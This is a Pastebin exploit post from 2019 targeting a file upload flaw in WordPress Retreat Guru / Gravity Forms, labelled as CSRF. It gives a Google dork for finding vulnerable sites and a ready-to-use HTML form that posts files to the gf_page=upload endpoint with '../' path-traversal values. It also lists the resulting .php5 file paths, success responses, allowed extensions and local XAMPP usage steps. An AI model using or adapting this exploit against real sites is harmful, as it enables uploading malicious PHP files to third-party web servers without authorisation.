Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : WordPress Retreat Guru Cross Site Request Forgery
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 22/05/2019
- # Vendor Homepage : retreat.guru - gravityforms.com
- # Software Affected Versions : N/A
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:Site by Retreat Guru site:com
- # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Impact :
- ***********
- WordPress Retreat Guru is vulnerable to cross-site request forgery, caused by
- improper validation of user-supplied input. By persuading an authenticated user to visit
- a malicious Web site, a remote attacker could send a malformed HTTP request to
- perform unauthorized actions. An attacker could exploit this vulnerability to perform
- cross-site scripting attacks, Web cache poisoning, and other malicious activities.
- The web application does not, or can not, sufficiently verify whether a well-formed,
- valid, consistent request was intentionally provided by the user who submitted the request.
- When a web server is designed to receive a request from a client without any mechanism
- for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
- client into making an unintentional request to the web server which will be treated as an
- authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
- can result in exposure of data or unintended code execution.
- ####################################################################
- # CSRF Cross Site Request Forgery Exploit :
- ****************************************
- <title>WordPress Retreat Guru Input Exploiter</title>
- <form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">
- <body background=" ">
- <input type="file" name="file" id="file"><br>
- <input name="form_id" value="../../../" type=hidden">
- <input name="name" value="kingskrupellos.html" type=''hidden">
- <input name="gform_unique_id" value="../../" type="hidden">
- <input name="field_id" value="" type="hidden">
- <input type="submit" name="gform_submit" value="submit">
- </form>
- # Directory File Path :
- ***********************
- /_input__kingskrupellos.php5
- /_input__[YOURFILENAME].php5
- # Vulnerability Error :
- *******************
- {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
- # Vulnerability Error [ Successful ] :
- *******************************
- {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
- # Allowed File Extensions :
- *************************
- .html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf
- # Example Usage for Windows :
- ******************************
- # Use with XAMPP Control Panel and your Localhost.
- # Use from htdocs folder located in XAMPP
- # 127.0.0.1/wordpressretreatguruexploiter.html
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement